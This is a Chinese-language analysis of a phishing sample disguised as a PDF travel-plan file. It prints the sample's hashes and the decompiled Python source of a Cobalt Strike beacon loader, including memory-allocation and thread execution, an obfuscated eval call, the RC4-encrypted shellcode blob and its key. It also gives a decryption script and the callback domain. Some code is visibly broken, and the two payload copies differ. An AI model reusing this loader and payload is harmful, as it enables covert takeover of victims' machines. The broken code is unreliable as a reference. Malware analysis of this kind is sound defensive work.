0x01 邮件原文与样本
hw期间内部邮箱网关收到了钓鱼邮件
邮件原文如下
解压后得到样本
财险内部旅游套餐方案.pdf.exe
样本为大小为5.88M,HASH如下
MD5
5bc32973b43593207626c0588fc6247e
SHA-1
551414cb283a56cf55817c720c2efee0144ea2ed
SHA-256
d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad
VT报毒 14/69 免杀效果尚可
通过Yara规则检测 为典型的Cobaltstrike x64 https beacon载荷
基于程序体积和逆向后获取到的函数判断 该恶意样本为Python编写的shellcodeloader来
加载CS https beacon X64 shellcode,后用py2exe程序进行封装。
对该程序进行逆向unpy2exe逆向分析 取得其源码
- \# uncompyle6 version 3.7.4
- \# Python bytecode 3.7
- \# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18)
- [MSC v.1900 64 bit (AMD64)]
- \# Embedded file name: py36test.py
- import ctypes, urllib, base64, requests, hashlib
- def shellCodeLoad(shellcode):
- ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
- ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)),
- ctypes.c_int(12288), ctypes.c_int(64))
- buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
- eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3Vp
- bnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='))
- handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr),
- ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
- ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))
- def rc4(text, key):
- key = hashlib.md5(key).hexdigest()
- text = base64.b64decode(text)
- result = ''
- key_len = len(key)
- box = list(range(256))
- j = 0
- for i in range(256):
- j = (j + box[i] + ord(key[(i % key_len)])) % 256
- box[i], box[j] = box[j], box[i]
- i = j = 0
- for element in text:
- i = (i + 1) % 256
- j = (j + box[i]) % 256
- box[i], box[j] = box[j], box[i]
- k = chr(element ^ box[((box + box[j]) % 256)])
- result += k
- return result
- if __name__ == '__main__':
- b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY
- 2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5
- Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8q
- opN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHqqUprU4
- 3eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFpt
- rZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNh
- PYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxT
- tzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8
- F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmln
- x8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmu
- Xesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+
- 7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg
- 0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qE
- ipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5Ika
- U0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ
- 3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5C
- PgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGO
- S2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+
- VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/
- RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
- mm = 'king6666'
- c = rc4(b, mm.encode('utf-8'))
- code = bytearray(base64.b64decode(c))
- shellCodeLoad(code)
分析得出该恶意样本是通过rc4算法解密base64加密的shellcode
并且使用VirtualAlloc开辟内存空间放入内存中执行
编写解密脚本
- import ctypes, urllib, base64, requests, hashlib
- def rc4(text, key):
- key = hashlib.md5(key).hexdigest()
- text = base64.b64decode(text)
- result = ''
- key_len = len(key)
- box = list(range(256))
- j = 0
- for i in range(256):
- j = (j + box[i] + ord(key[(i % key_len)])) % 256
- box[i], box[j] = box[j], box[i]
- i = j = 0
- for element in text:
- i = (i + 1) % 256
- j = (j + box[i]) % 256
- box[i], box[j] = box[j], box[i]
- k = chr(element ^ box[((box + box[j]) % 256)])
- result += k
- return result
- b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2Q
- CJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76F
- cuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8q
- MZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3F
- MLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2
- mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ
- 1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUd
- MtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4
- xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9py
- dXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F6
- 6/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7
- X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6Rip
- hkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6k
- ZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh
- 9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7As
- IDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0D
- lE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2F
- B585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7z
- Wc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHt
- UGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
- mm = 'king6666'
- c = rc4(b, mm.encode('utf-8'))
- code = bytearray(base64.b64decode(c))
- print(code)
得到其shellcode
回连地址为www.alibababaa.com
为典型的cobaltstrike https x64 beacon shellcode
至此 分析结束 |
